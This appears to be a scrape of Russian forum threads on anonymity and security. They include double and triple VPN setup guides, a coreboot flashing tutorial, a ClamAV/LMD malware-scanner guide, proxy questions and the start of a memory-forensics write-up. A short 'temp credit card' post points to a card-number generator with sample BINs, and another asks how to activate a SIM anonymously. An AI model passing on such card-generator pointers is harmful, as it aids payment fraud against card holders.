VPN1 в идеале должен находиться в той же стране, что и пользователь по двум причинам:

Для ускорения сигнала и минимизации задержек.

Многие ресурсы запрещают доступ из других локаций.

VPN2 может находиться в стране, где нет тех ограничений, которые необходимо обойти. Чем ближе к локации пользователя он будет находиться, тем лучше по той же первой причине выше.

Для дальнейшего понимания что и куда "втыкать" определимся с данными серверов:
VPN1:

Code:Copy to clipboard

IP1 - 11.11.11.11 ip1_gateway - 11.11.11.1 IP_VPN1 - 192.168.11.1 ip_gateway_vpn1 - 192.168.11.1

VPN2:

Code:Copy to clipboard

IP2 - 12.12.12.12 ip2_gateway - 12.12.12.1 IP_VPN2 - 192.168.12.1 ip_gateway_vpn2 - 192.168.12.1

На сервере VPN1 мы подключаем пользователей с перенаправлением всего трафика, а на сервер VPN2 подключаем сервер VPN1 с «локальным» подключением. «Локальное» подключение — подключение при котором между серверами создается только туннель и в него идет определенный трафик, а весь трафик по умолчанию идет в обход туннеля.

Приступим к настройке сервера VPN1.

Для начала установим необходимые утилиты:

Code:Copy to clipboard

apt update && apt upgrade apt install sudo vim shorewall curl wget openvpn dnsutils -y

Включаем пересылку пакетов на сервере. Находим строку и приводим ее к следующему виду:

Code:Copy to clipboard

vim /etc/sysctl.conf

Code:Copy to clipboard

net.ipv4.ip_forward=1

Code:Copy to clipboard

sysctl -p cd /etc/shorewall/

Далее нам надо взять шаблоны необходимых файлов, чтобы не писать их с нуля:

Code:Copy to clipboard

cp /usr/share/doc/shorewall/examples/two-interfaces/{interfaces,policy,rules,snat,zones} /etc/shorewall/ cp /usr/share/shorewall/configfiles/{tunnels,routes} /etc/shorewall/ mkdir {local,routes.d}

Теперь приводим шаблоны к нашей ситуации. На сервере VPN1 у нас будет три интерфейса:
ens3 – физический интерфейс с внешним статическим IP,
tun1u – виртуальный интерфейс vpn1.server,
tun2u – виртуальный интерфейс vpn2.client.

Сервер VPN1 находится в зоне ru, значит так ее и назовем, а VPN2 находится в зоне nl:

Code:Copy to clipboard

vim zones

Code:Copy to clipboard

fw firewall net ipv4 ru ipv4 nl ipv4

Обращаем внимание на названия интерфейсов!

Code:Copy to clipboard

vim interfaces

Code:Copy to clipboard

net ens3 dhcp,tcpflags,nosmurfs,routefilter,logmartians,sourceroute=0 ru tun1u optional,tcpflags,nosmurfs,routefilter,logmartians nl tun2u optional,tcpflags,nosmurfs,routefilter,logmartians

В следующем файле мы прописываем настройки для пересылки трафика VPN, где указываем свои протокол и порт vpn сервера:

Code:Copy to clipboard

vim tunnels

Code:Copy to clipboard

openvpnserver:udp:11443 net 0.0.0.0/0

Нам надо включить маскардинг, для этого в файле snat убираем дефолтные настройки и прописываем свои с подстановкой своих подсетей:

Code:Copy to clipboard

vim snat

Code:Copy to clipboard

MASQUERADE 192.168.11.0/24 ens3 MASQUERADE 192.168.11.0/24 tun2u

Code:Copy to clipboard

vim policy

Code:Copy to clipboard

$FW net ACCEPT $FW ru ACCEPT $FW nl ACCEPT ru $FW ACCEPT ru net ACCEPT ru nl ACCEPT net all DROP $LOG_LEVEL # THE FOLOWING POLICY MUST BE LAST all all REJECT $LOG_LEVEL

Code:Copy to clipboard

vim rules

Code:Copy to clipboard

?SECTION ALL ?SECTION ESTABLISHED ?SECTION RELATED ?SECTION INVALID ?SECTION UNTRACKED ?SECTION NEW # Don't allow connection pickup from the net # Invalid(DROP) net all tcp # # Accept DNS connections from the firewall to the network # DNS(ACCEPT) $FW net # # Accept SSH connections from the local network for administration # SSH(ACCEPT) net $FW SSH(ACCEPT) nl $FW SSH(ACCEPT) ru $FW SSH(ACCEPT) $FW net SSH(ACCEPT) $FW nl SSH(ACCEPT) $FW ru # # Allow Ping from the local network # Ping(ACCEPT) nl $FW Ping(ACCEPT) ru $FW # # Drop Ping from the "bad" net zone.. and prevent your log from being flooded.. # Ping(DROP) net $FW ACCEPT $FW nl icmp ACCEPT $FW ru icmp ACCEPT $FW net icmp

Настраиваем vpn сервер, запускаем. Так же перезапускаем shorewall:

Code:Copy to clipboard

systemctl restart shorewall systemctl enable shorewall

Можем выпустить уже пользовательский сертификат с оборотом всего трафика и проверить работоспособность. Проверить можно на сайте https://2ip.ru ну или на том, который больше нравится. Если подключение пошло, на сайте мы увидели IP сервера, тогда все сделали верно.

Начинаем настраивать VPN2.

Для начала установим необходимые утилиты:

Code:Copy to clipboard

apt update && apt upgrade apt install sudo vim shorewall curl wget openvpn dnsutils -y

Включаем пересылку пакетов на сервере. Находим строку и приводим ее к следующему виду:

Code:Copy to clipboard

vim /etc/sysctl.conf

Code:Copy to clipboard

net.ipv4.ip_forward=1

Code:Copy to clipboard

sysctl -p cd /etc/shorewall/

Далее нам надо взять шаблоны необходимых файлов, чтобы не писать их с нуля:

Code:Copy to clipboard

cp /usr/share/doc/shorewall/examples/two-interfaces/{interfaces,policy,rules,snat,zones} /etc/shorewall/ cp /usr/share/shorewall/configfiles/tunnels /etc/shorewall/

Теперь приводим шаблоны к нашей ситуации. На сервере VPN2 у нас будет два интерфейса:

ens3 – физический интерфейс с внешним статическим IP,
tun2u – виртуальный интерфейс vpn2.server.

Сервер VPN2 находится в зоне nl, значит так ее и назовем:

Code:Copy to clipboard

vim zones

Code:Copy to clipboard

fw firewall net ipv4 nl ipv4

Обращаем внимание на названия интерфесов!

Code:Copy to clipboard

vim interfaces

Code:Copy to clipboard

net ens3 dhcp,tcpflags,nosmurfs,routefilter,logmartians,sourceroute=0 nl tun2u optional,tcpflags,nosmurfs,routefilter,logmartians

В следующем файле мы прописываем настройки для пересылки трафика VPN где указываем свои протокол и порт vpn сервера:

Code:Copy to clipboard

vim tunnels

Code:Copy to clipboard

openvpnserver:udp:12443 net 0.0.0.0/0

Далее нам надо включить маскардинг, для этого в следующем файле убираем дефолтные настройки и прописываем свои с подстановкой своих подсетей:

Code:Copy to clipboard

vim snat

Code:Copy to clipboard

MASQUERADE 192.168.0.0/16 ens3

Code:Copy to clipboard

vim policy

Code:Copy to clipboard

$FW net ACCEPT $FW nl ACCEPT nl net ACCEPT net all DROP $LOG_LEVEL # THE FOLOWING POLICY MUST BE LAST all all REJECT $LOG_LEVEL

Code:Copy to clipboard

vim rules

Code:Copy to clipboard

?SECTION ALL ?SECTION ESTABLISHED ?SECTION RELATED ?SECTION INVALID ?SECTION UNTRACKED ?SECTION NEW # Don't allow connection pickup from the net # Invalid(DROP) net all tcp # # Accept DNS connections from the firewall to the network # DNS(ACCEPT) $FW net # # Accept SSH connections from the local network for administration # SSH(ACCEPT) net $FW SSH(ACCEPT) nl $FW SSH(ACCEPT) $FW net SSH(ACCEPT) $FW nl # # Allow Ping from the local network # Ping(ACCEPT) nl $FW Ping(ACCEPT) nl nl # # Drop Ping from the "bad" net zone.. and prevent your log from being flooded.. # Ping(DROP) net $FW ACCEPT $FW nl icmp ACCEPT $FW net icmp

Настраиваем vpn сервер, запускаем. Так же перезапускаем shorewall

Code:Copy to clipboard

systemctl restart shorewall systemctl enable shorewall

Теперь можем создать пользовательский сертификат, но без оборачивания всего трафика в vpn, который только создаст туннель между VPN1 сервером и VPN2, локальный. Сертификат отправляем на VPN1 сервер, включаем и добавляем в автозагрузку.

Теперь начинаем делать то, ради чего все и затевалось. Нам надо настроить маршрутизацию трафика по зонам (да, мы делаем только два сервера, но можно сделать и больше). Первое, что мы должны сделать, это создать список адресов локации.

Сложный, нудный, но веселый вариант
Для этого мы идем на [сайт](https://lite.ip2location.com/ip-address-ranges-by- country) и выбираем для какой страны (страна, где мы находимся).

Мы получаем список сетей с начальным и конечным адресами и в таком виде мы не можем их использовать, нам надо привести их к следующему виду xx.xx.xx.xx/xx, а для этого нужно правльно высчитать маску каждой сети из таблицы. Можно вручную считать на бумажке или в уме, а можно пойти сюда и считать с помощью калькулятора сетей. Нужно быть очень внимательным при пересчете, ведь допущенные ошибки могут привести к тому, что трафик будет перенаправляться не так, как нам надо или система совсем не заведется.

И так, считаем сети и сразу записываем в файл /etc/shorewall/local/ru на сервере VPN1 в колонку в виде:

Code:Copy to clipboard

xx.xx.xx.xx/xx xx.xxx.xx.xx/xx и т.д.

Работа достаточно большая, особенно если страна большая)

Простой и скучный вариант
Идем на тот же сайт, но чуть дальше, выбираем страну и формат CIDR и скачиваем архив со списком адресов в нужном нам формате, однако в списке есть первые лишние строки, удаляем их и сохраняем в файл /etc/shorewall/local/ru на сервере VPN1.

Закончили? Идем дальше. Теперь нам надо сделать так, чтобы данные адреса в нужном формате попали в конфигурационный файл, плюс включить пересылку трафика на VPN2, для этого нам надо создать скрипт (можно не паниковать, я уже давно все написал, нам надо только скопировать и вставить, подставляя свои значения):

Code:Copy to clipboard

cd /etc/shorewall/ vim auto.sh

Code:Copy to clipboard

#!/bin/bash input=local/ru output=routes.d/ru localnet="<ip1_gateway>" interface=ens3 tun2=tun2u ip2="<IP2>" ip_gateway_vpn2="<ip_gateway_vpn2>" echo "#provider dest gateway device" > $output echo "#provider dest gateway device main 0.0.0.0/0 $ip_gateway_vpn2 $tun2 main $ip2 $localnet $interface #connect nl main 195.201.201.32 $localnet $interface #check 2ip.ru INCLUDE /etc/shorewall/routes.d/ru" > routes while IFS= read -r network do echo "main $network $localnet $interface" >> $output done < $input

Важное замечание
Данная схема будет работать только в том случае, если и клиент подключатся из той же зоны, где сервер VPN1, в противном случае доступа к серверу не будет. Однако если есть желание дать другу из Турции сертификат к своему vpn, то надо взять его IP адрес и добавить в файл routes:
vim /etc/shorewall/routes

Code:Copy to clipboard

... main <IP_of_friend> <localnet> <interface> ...

Теперь делаем файл исполняемым:

Code:Copy to clipboard

chmod +x auto.sh

Запускаем скрипт и перезапускаем shorewall:

Code:Copy to clipboard

./auto.sh shorewall restart

Теперь у нас практически все готово, сначала проверим работу. Подключаемся к vpn и идем проверять. Переходим на сайт 2ip.ru и видим адрес VPN1, так как мы прописали пересылку пакетов на этот сайт через VPN1. Теперь идем на сайт 2ip.ua или любой другой, но который точно не находится в зоне ru (в примере я делал для нее) и видим адрес VPN2. Если все так, тогда поздравляю, если нет, тогда стоит проверить все еще раз по шагам.

Остался последний шаг на сервере VPN1, если конечно не хотим делать все вручную каждый раз после перезагрузки (при чем доступ по ssh будет закрыт). Нам надо настроить условие автозагрузки shorewall. Для этого мы редактируем файл /usr/lib/systemd/system/shorewall.service и меняем строчку «After=network-online.target» на «After=openvpn@cli002008.service», где cli002008 имя моего сертификата:

Code:Copy to clipboard

vim /usr/lib/systemd/system/shorewall.service

Проблемное место
На свежей версии debian shorewall не хочет запускаться после openvpn, что мы указывали выше. Я не разобрался пока в проблеме, если у кого-то есть ответ, то пишите в комментариях. Пока предложу другое решение, запускать через cron:
crontab -e

Code:Copy to clipboard

... @reboot sleep 10; systemctl restart shorewall ...

Теперь все готово!

Сервера брал тут, можно купить "вечный сервер". Еще использую сервера здесь, данный хостинг имеет большое разнообразие локаций по приемлемым ценам.

Можно настроить обновление данных в автоматическом режиме. Через крон будет скачиваться файл с адресами и записываться в shorewall, но данный способ является платным. Надо купить подписку и получить ссылку и токен для скачивания в следующем формате:

Code:Copy to clipboard

curl -o firewall.gz 'https://dl.ip2location.com/v1/firewall?token=mOdUlMdh0nK9Oap3iHaJxFrX0koqVahHX9Е9gfZhP9nURa126U4xnS9vKlbU3gry&country=RU|BY&format=cidr'

автор @dumasti
habr.com

Is “KAX17” performing de-anonymization Attacks against Tor Users?

ID: 676533bbb4103b69df371b76
Thread ID: 59680
Created: 2021-12-04T19:10:05+0000
Last Post: 2021-12-07T16:52:28+0000
Author: unknow2156
Replies: 6 Views: 282

[ Is “KAX17” performing de-anonymization Attacks against Tor Users?

](https://nusenu.medium.com/is-kax17-performing-de-anonymization-attacks- against-tor-users-42e566defce8)

Hashtag: #KAX17

nusenu.medium.com

Свой не детектируемый тройной VPN

ID: 676533bbb4103b69df371995
Thread ID: 110618
Created: 2024-03-17T12:57:06+0000
Last Post: 2024-03-17T12:57:06+0000
Author: ThorZirael
Prefix: Видео
Replies: 0 Views: 281

Создаем собственный неблокируемый двойной / тройной VPN на ShadowSocks-2022.

00:00 Вступление
00:36 Отличие двойного / тройного VPN от обычного
01:08 Что такое не детектируемые (неблокируемый) VPN
01:37 Про ShadowSocks-2022
02:26 Анонимность двойных / тройных VPN
03:30 Выбор VPS серверов для VPN
05:05 Что из программ необходимо
05:52 Техническая часть видео. Установка и настройка
22:00 Как заработать на этом заработать?
24:30 Не нарушаем Закон

Полезные ссылки с видео

[ 3X-UI: Shadowsocks-2022 & XRay (XTLS) ÑÐµÑÐ²ÐµÑ Ñ Ð¿ÑÐ¾ÑÑÐ¾Ð¹

Ð½Ð°ÑÑÑÐ¾Ð¹ÐºÐ¾Ð¹ Ð¸ Ð¿ÑÐ¸ÑÑÐ½ÑÐ¼ Ð¸Ð½ÑÐµÑÑÐµÐ¹ÑÐ¾Ð¼ ](https://habr.com/ru/articles/735536/)

Ð¡ÑÐ°ÑÑÑ Ð¾Ð¿ÑÐ±Ð»Ð¸ÐºÐ¾Ð²Ð°Ð½Ð° Ð¿Ð¾Ð´ Ð»Ð¸ÑÐµÐ½Ð·Ð¸ÐµÐ¹ Creative Commons BY- NC-SA . Ð ÑÐµÑÐ¸Ð¸ Ð¿ÑÐµÐ´ÑÐ´ÑÑÐ¸Ñ ÑÑÐ°ÑÐµÐ¹ Ñ Ð¾Ð¿Ð¸ÑÑÐ²Ð°Ð», Ð¿Ð¾ÑÐµÐ¼Ñ Ð¿Ð¾Ð²ÑÐµÐ¼ÐµÑÑÐ½Ð¾ Ð¸ÑÐ¿Ð¾Ð»ÑÐ·ÑÐµÐ¼ÑÐµ VPN- Ð¸ Ð¿ÑÐ¾ÐºÑÐ¸-Ð¿ÑÐ¾ÑÐ¾ÐºÐ¾Ð»Ñ ÑÐ°ÐºÐ¸Ðµ ÐºÐ°Ðº OpenVPN Ð¸ L2TP Ð¾ÑÐµÐ½Ñ ÑÑÐ·Ð²Ð¸Ð¼Ñ...

![habr.com](/proxy.php?image=https%3A%2F%2Fassets.habr.com%2Fhabr- web%2Fimg%2Ffavicons%2Ffavicon-16.png&hash=92e2dae146214fab23606c51ef42d36d&return_error=1) habr.com

3X-UI: https://github.com/MHSanaei/3x-ui

NekoRay https://github.com/MHSanaei/3x-ui
Для Iphone / Android - V2Box — клиент V2ray

Тезисно, подымаем на 2-х VPS панель 3X-UI: https://github.com/MHSanaei/3x-ui,

на первом VPS ShadowSocks-2022 или VLESS с XTLS-Reality, на втором VPS подымаем ту же панель и создаем конфиг с еще одним ShadowSocks-2022.

Далее на первом VPS добавляем исходящий с конфигом второго ShadowSocks-2022 c второй панели и создаем правило маршрутизации.
На втором VPS добавляем исходящий с 1.1.1.1 WARP+ и создаем правило маршрутизации.

Итого имеем ShadowSocks-2022 > ShadowSocks-2022 > 1.1.1.1 WARP+.

Все очень легко настраивается благодаря графическому интерфейсу панели 3X-UI.

Установка Coreboot на Lenovo ThinkPad T440p

ID: 676533bbb4103b69df3719e7
Thread ID: 102347
Created: 2023-11-16T07:38:52+0000
Last Post: 2023-11-16T07:38:52+0000
Author: Argos
Prefix: Мануал/Книга
Replies: 0 Views: 280

В данной статье я хочу описать процесс компиляции и установки coreboot на ноутбук Lenovo Thinkpad t440p.
В данном случае coreboot нужен был для удаления whitelist'а для wi-fi адаптеров в ноутбуке, хотя это можно сделать и проще, но я выбрал именно такой путь.
Для компиляции и установки coreboot нам понадобится программатор с клипсой и другое устройсво, под управлением какого-либо дистрибутива линукс(в моем случае - debian).
Приступим к процессу:
Для начала, необходимо разобрать ноутбук, чтобы получить доступ к микросхемам биоса(в данном ноутбуке их 2)

На рабочем устройстве устанавливаем необходимые программы для компиляции прошивки и работы с программатором, работа ведется из-под Ubuntu 22.04

Code:Copy to clipboard

sudo apt install flashrom build-essential zlib1g-dev uuid-dev libdigest-sha-perl libelf-dev bc bzip2 bison flex git gnupg gawk iasl m4 nasm patch python python2 python3 wget gnat cpio ccache pkg-config cmake libusb-1.0-0-dev autoconf texinfo ncurses-dev doxygen graphviz udev libudev1 libudev-dev automake libtool rsync innoextract sudo libssl-dev device-tree-compiler u-boot-tools sharutils e2fsprogs parted curl unzip imagemagick libncurses5-dev

После этого создаем рабочую папку, где будут хранится файлы для создания прошивки (в моем случае, папка называется t440p)

Code:Copy to clipboard

mkdir ~/<название_папки>/

Переходим в данную папку

Code:Copy to clipboard

cd ~/<название_папки>/

Присоеденяем клипсу к верхнему чипу (на 4MB) и пробуем считать информацию с чипа

Code:Copy to clipboard

sudo flashrom -p ch341a_spi

Если всё нормально, делаем бекап образа с данного чипа

Code:Copy to clipboard

sudo flashrom --programmer ch341a_spi -r <название_образа_чипа>.bin

Аналогичную операцию делаем с нижним чипом (на 8MB).
Объеденим 2 образа в 1

Code:Copy to clipboard

cat <название_образа_чипа_8MB>.bin <название_образа_чипа_4MB>.bin > <название_образа_12MB>.rom

Переходим в домашнюю директорию и скачиваем coreboot

Code:Copy to clipboard

git clone https://review.coreboot.org/coreboot

Переходим в директорию с coreboot

Code:Copy to clipboard

cd ~/coreboot

Скачиваем дополнительные модули

Code:Copy to clipboard

git submodule update --init --checkout

Собираем ifdtool

Code:Copy to clipboard

cd util/ifdtool && make

Берем блобы из оригинального биоса, выполняя последовательно слебующие команды:

Code:Copy to clipboard

./ifdtool -x ~/<название_рабочей_папки>/<название_образа_12MB>.rom mv flashregion_0_flashdescriptor.bin ~/<название_рабочей_папки>/ifd.bin mv flashregion_2_intel_me.bin ~/<название_рабочей_папки>/me.bin mv flashregion_3_gbe.bin ~/<название_рабочей_папки>/gbe.bin

Получаем mrc.bin, выполняя следующие команды:

Code:Copy to clipboard

cd ~/coreboot make -C util/cbfstool cd util/chromeos ./crosfirmware.sh peppy ../cbfstool/cbfstool coreboot-*.bin extract -f mrc.bin -n mrc.bin -r RO_SECTION mv mrc.bin ~/<название_рабочей_папки>/mrc.bin

Конфигурируем образ coreboot (для облегчения задачи, я взял готовый конфиг с полезной нагрузкой Tianocore - альтернатива UEFI)

Code:Copy to clipboard

cd ~/coreboot nano .config

В открывшеея окно вставляем следующие строки:

Code:Copy to clipboard

CONFIG_USE_OPTION_TABLE=y CONFIG_TIMESTAMPS_ON_CONSOLE=y CONFIG_VENDOR_LENOVO=y CONFIG_CBFS_SIZE=0x200000 CONFIG_LINEAR_FRAMEBUFFER_MAX_WIDTH=2560 CONFIG_LINEAR_FRAMEBUFFER_MAX_HEIGHT=1600 CONFIG_IFD_BIN_PATH="/home/<имя_пользователя>/<название_рабочей_папки>/ifd.bin" CONFIG_ME_BIN_PATH="/home/<имя_пользователя>/<название_рабочей_папки>/me.bin" CONFIG_GBE_BIN_PATH="/home/<имя_пользователя>/<название_рабочей_папки>/gbe.bin" CONFIG_CONSOLE_CBMEM_BUFFER_SIZE=0x20000 CONFIG_HAVE_IFD_BIN=y CONFIG_BOARD_LENOVO_THINKPAD_T440P=y CONFIG_PCIEXP_L1_SUB_STATE=y CONFIG_PCIEXP_CLK_PM=y CONFIG_HAVE_MRC=y CONFIG_MRC_FILE="/home/<имя_пользователя>/<название_рабочей_папки>/mrc.bin" CONFIG_UART_PCI_ADDR=0x0 CONFIG_VALIDATE_INTEL_DESCRIPTOR=y CONFIG_H8_SUPPORT_BT_ON_WIFI=y CONFIG_HAVE_ME_BIN=y CONFIG_CHECK_ME=y CONFIG_USE_ME_CLEANER=y CONFIG_HAVE_GBE_BIN=y CONFIG_SUBSYSTEM_VENDOR_ID=0x0000 CONFIG_SUBSYSTEM_DEVICE_ID=0x0000 CONFIG_SMMSTORE_SIZE=0x40000 CONFIG_DRIVERS_PS2_KEYBOARD=y CONFIG_TPM_DEACTIVATE=y CONFIG_SECURITY_CLEAR_DRAM_ON_REGULAR_BOOT=y CONFIG_POST_IO_PORT=0x80 CONFIG_PAYLOAD_TIANOCORE=y CONFIG_TIANOCORE_BOOTSPLASH_IMAGE=y CONFIG_TIANOCORE_BOOTSPLASH_FILE="/home/<имя_пользователя>/<название_рабочей_папки>/bootsplash.bmp"

Сохраняем изменения и создаем конфиг

Code:Copy to clipboard

cd ~/coreboot make nconfig

В открывшемя окне, жмем F9 (либо, можно изменить конфигурцию под ваши требования)
Компилируем прошивку (CPUS=16 - число потоков)

Code:Copy to clipboard

make crossgcc-i386 CPUS=16 make

Необходимо разбить образ в 12MB на 2 образа по 8MB и 4MB

Code:Copy to clipboard

cd ~/coreboot/build dd if=coreboot.rom of=<название_образа_чипа_8MB_coreboot>.rom bs=1M count=8 dd if=coreboot.rom of=<название_образа_чипа_4MB_coreboot>.rom bs=1M skip=8

Снова присоеденяем программатор, считываем и прошивем оба чипа соотвествующими образами следующей командой(команду выполнить для обоих чипов):

Code:Copy to clipboard

sudo flashrom --programmer ch341a_spi -w <название_образа_чипа_coreboot>.rom

После этого собираем ноутбук и проверяем работоспособность.

Для тех, кто не хочет собирать образ coreboot самостоятельно (а я этот процесс крайне не рекомендую, т.к. он съедает много нервов и времени), есть более простой способ установить coreboot + SeaBIOS - https://github.com/merge/skulls

Настройка прокси на MacOS (SOCKS5)

ID: 676533bbb4103b69df37199d
Thread ID: 109067
Created: 2024-02-26T09:48:00+0000
Last Post: 2024-02-26T15:05:00+0000
Author: JerryManson
Replies: 2 Views: 279

Задача прокинуть SOCKS5 прокси на MAC OS без каких-либо утечек, точнее чтоб в браузере Safari ничего не палилось лишнего. При подключении через Proxifier почему-то палятся локальные DNS-сервера, пробовал разные прокси. Также в большей степени интересует вариант настройки SOCKS5 на роутер, но не знаю поможет ли это вообще. Есть у кого какой опыт?)

[Question] VMWARE, обсуждение (encryption)?

ID: 676533bbb4103b69df3719ff
Thread ID: 99561
Created: 2023-10-07T03:41:58+0000
Last Post: 2023-10-07T05:38:16+0000
Author: sovietmute
Replies: 1 Views: 277

This is a question which has plagued me for months. Do they store the keys locally in the case of VMware VM encryption?
Is it really safe as they suggest?

Как интегрировать Linux Malware Detection и ClamAV для автоматического обнаружения вредоносных программ на серверах Linux

ID: 676533bbb4103b69df371a5c
Thread ID: 88528
Created: 2023-05-21T12:44:47+0000
Last Post: 2023-05-21T12:44:47+0000
Author: DedJhones
Prefix: Мануал/Книга
Replies: 0 Views: 276

Как интегрировать Linux Malware Detection и ClamAV для автоматического

обнаружения вредоносных программ на серверах Linux

Допустим, вы развернули Linux в качестве сервера в дата центре из-за надежности и безопасности, которые предлагает платформа с открытым исходным кодом. Не дайте себя обмануть, думая, что использование Linux будет завершением всех ваших потребностей в безопасности. Всегда важно помнить, что, пока он подключен к сети, любой компьютер уязвим. На ваших серверах Linux может быть любое количество пользователей, которые входят в систему и сохраняют файлы в многочисленные каталоги. Или, может быть, вы используете Linux в качестве почтового сервера, на котором отправляются и принимаются вложения. Независимо от того, почему вы используете этот сервер Linux, важно принять необходимые меры предосторожности для защиты этих серверов и тех, кто их использует. Один из способов добавить уровень защиты от вредоносных программ – интегрировать Linux Malware Detection (LMD) и ClamAV. Эта комбинация использует LMD в качестве инструмента обнаружения вредоносных программ и ClamAV в качестве антивирусного ядра. После того, как вы установили и настроили эту комбинацию, вы можете быть уверены, что ваши серверы Linux более защищены от таких угроз.

Как установить и настроить LMD

Первое, что мы сделаем, это установим LMD.

Зайдите на свой сервер и загрузите последнюю версию с помощью команды:

wget http://www.rfxn.com/downloads/maldetect-current.tar.gz

После завершения загрузки распакуйте файл с помощью команды:

tar xvzf maldetect-current.tar.gz

Установите программное обеспечение с помощью команды:

sudo ./install.sh

После установки maldetect нам нужно настроить его для работы с ClamAV, который мы вскоре установим.

Откройте файл конфигурации с помощью команды:

sudo nano /usr/local/maldetect/conf.maldet

Убедитесь, что в этом файле установлены следующие параметры конфигурации:

email_alert=1
email_addr=EMAIL
email_subj="Malware alerts for $HOSTNAME - $(date +%Y-%m-%d)"
quarantine_hits=1
quarantine_clean=1
quarantine_susp=1
scan_clamscan="1"

Click to expand...

Где EMAIL – это адрес электронной почты, на который будут приходить оповещения.

Если вам не нужно получать оповещения по электронной почте, оставьте для параметра email_alert значение 0 и не меняйте запись email_addr.

Сохраните и закройте файл.

Как установить ClamAV

Теперь установим ClamAV.

Для этого введите команду:

sudo apt-get install clamav clamav-daemon -y

Если вы используете дистрибутив на основе Red Hat, вам необходимо сначала включить репозиторий EPEL с помощью команды:

sudo dnf install epel-release -y

После этого вы можете установить ClamAV с помощью команд:

sudo dnf update sudo dnf install clamd

Как протестировать LDM / ClamAV

Чтобы протестировать эту систему, мы скачаем на сервер печально известные файлы EICAR.

Перейдите в каталог /srv (с помощью команды: cd /srv) и выполните следующие команды:

sudo wget http://www.eicar.org/download/eicar.com sudo wget http://www.eicar.org/download/eicar.com.txt sudo wget http://www.eicar.org/download/eicar_com.zip sudo wget http://www.eicar.org/download/eicarcom2.zip

После того, как вы скачали файлы, запустите сканирование этого каталога с помощью команды:

sudo maldet --scan-all /srv

Когда сканирование завершится, вы должны увидеть, что система обнаружила файлы и поместила их в карантин.

Все четыре файла EICAR будут удалены из каталога /srv.

Вам не нужно беспокоиться о запуске сканирования вручную – хотя вы можете это сделать в любое время, – потому что maldet будет настроен на ежедневное выполнение (через cron).

И это все, что нужно для развертывания надежной системы обнаружения вредоносных программ/вирусов на ваших серверах Linux.

Активация, вопросы анонимности SIM

ID: 676533bbb4103b69df371aa6
Thread ID: 74394
Created: 2022-10-16T11:12:34+0000
Last Post: 2022-10-16T15:29:22+0000
Author: kyb
Replies: 3 Views: 274

Достал симку теле2, как её активировать анонимно?

Возможно ли использовать OpenVPN как прокси?

ID: 676533bbb4103b69df371b35
Thread ID: 64180
Created: 2022-03-13T00:05:10+0000
Last Post: 2022-03-13T04:44:26+0000
Author: chillco
Replies: 2 Views: 272

Здравствуйте. Возможно ли использовать OpenVPN демон как прокси (локальный SOCKS5) вместо создания виртуального сетевого интерфейса который бы перенаправлял бы трафик всей системы? Реализована ли уже такая фича? Если нет, есть ли наработки? И вообще, реализуемо ли это?
Знаю, что добиться подобного можно используя виртуальные роутеры, но это слишком запарно, так как нужен не один прокси и менять их часто. Нужно запускать несколько OpenVPN соединений в одной системе, подключение к которым бы производилось по SOCKS5 протоколу.

temp credit card

ID: 676533bbb4103b69df371b9b
Thread ID: 57377
Created: 2021-10-05T02:02:47+0000
Last Post: 2021-10-05T02:02:47+0000
Author: wx69wx
Replies: 0 Views: 272

bestccgen.com

for example:

BIN:5387639xxxxxxxxx
IP:USA

BIN: 536595xxxxxxxx00
IP: ?? Philippines

Omemo (XMPP), обсуждение

ID: 676533bbb4103b69df371a6f
Thread ID: 85871
Created: 2023-04-13T22:22:18+0000
Last Post: 2023-04-13T22:32:50+0000
Author: g-man-original
Replies: 1 Views: 270

Привет народ, к вам вопрос. Почему omemo не популярен?

1. Ведь OTR как плагин почти везде deprecated. А то что народ сидит на старом софте еще больше удручает.
2. omemo поддерживает групповые чат.

Проблемы с торбраузером

ID: 676533bbb4103b69df371b6c
Thread ID: 60491
Created: 2021-12-26T11:32:30+0000
Last Post: 2021-12-26T12:18:52+0000
Author: qvp
Replies: 2 Views: 269

Нет соединения. Есть ли решения?

Уроки форензики. Извлекаем артефакты из дампа памяти сервера

ID: 676533bbb4103b69df371a44
Thread ID: 92313
Created: 2023-07-07T14:58:09+0000
Last Post: 2023-07-07T14:58:09+0000
Author: baykal
Prefix: Статья
Replies: 0 Views: 269

Когда злоумышленники атакуют сеть предприятия, у специалистов по информационной безопасности зачастую остается не так уж и много материала для исследований — например, только образ памяти скомпрометированного сервера. Подобную ситуацию описывает задание BSidesJeddah- Part2 с ресурса CyberDefenders, которое мы сегодня разберем.

Наша задача — выявить причины взлома веб‑сервиса, развернутого на Oracle WebLogic Server, и научиться извлекать основные артефакты из образа оперативной памяти Windows.

По сценарию устройство мониторинга сетевой безопасности зафиксировало подозрительный трафик, исходящий от одного из веб‑серверов организации. Мы должны проанализировать образ памяти сервера и восстановить картину взлома информационного ресурса.

ИСПОЛЬЗУЕМЫЕ УТИЛИТЫ

Volatility Framework 2.6.1 — инструмент, реализованный на Python версии 2 и предназначенный для извлечения артефактов из образцов энергозависимой памяти.

Volatility 3 — обновленный инструмент для извлечения артефактов, разработанный на Python 3.

Загрузим файл [архива](https://cyberdefenders.org/blueteam-ctf- challenges/enroll/82) с артефактами, извлечем из него файл memory.mem (SHA256:5b3b1e1c92ddb1c128eca0fa8c917c16c275ad4c95b19915a288a745f9960f39) и приступим к исследованию.

ИССЛЕДОВАНИЕ ОБРАЗА ПАМЯТИ

При работе с этим образом мы будем пользоваться фреймворком Volatility версий 2 и 3. Их основное различие описано в документации. Удобство работы с третьей версией заключается в том, что она не использует профили операционной системы, а умеет определять их на лету, с помощью таблиц символов Windows. Но большинство плагинов разработано для второй версии.

Получим профиль операционной системы для работы с утилитой Volatility 2.

Code:Copy to clipboard

python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem imageinfo

Профиль операционной системы — Win2016x64_14393.

Прежде чем мы приступим к анализу артефактов, необходимо понять, с какой системой мы работаем. Для этого получим версию операционной системы, имя компьютера, а также сетевой адрес. Пробежимся по ключам реестра с использованием плагина printkey.

Code:Copy to clipboard

python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem --profile=Win2016x64_14393 printkey -K "ControlSet001\Control\ComputerName\ComputerName"

Имя компьютера — WIN-8QOTRH7EMHC.

Code:Copy to clipboard

python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem --profile=Win2016x64_14393 printkey -o 0xffff808fe7e41000 -K "ControlSet001\Services\Tcpip\Parameters\Interfaces"

Мы получили список идентификаторов сетевых интерфейсов. Проверим каждый из них.

Code:Copy to clipboard

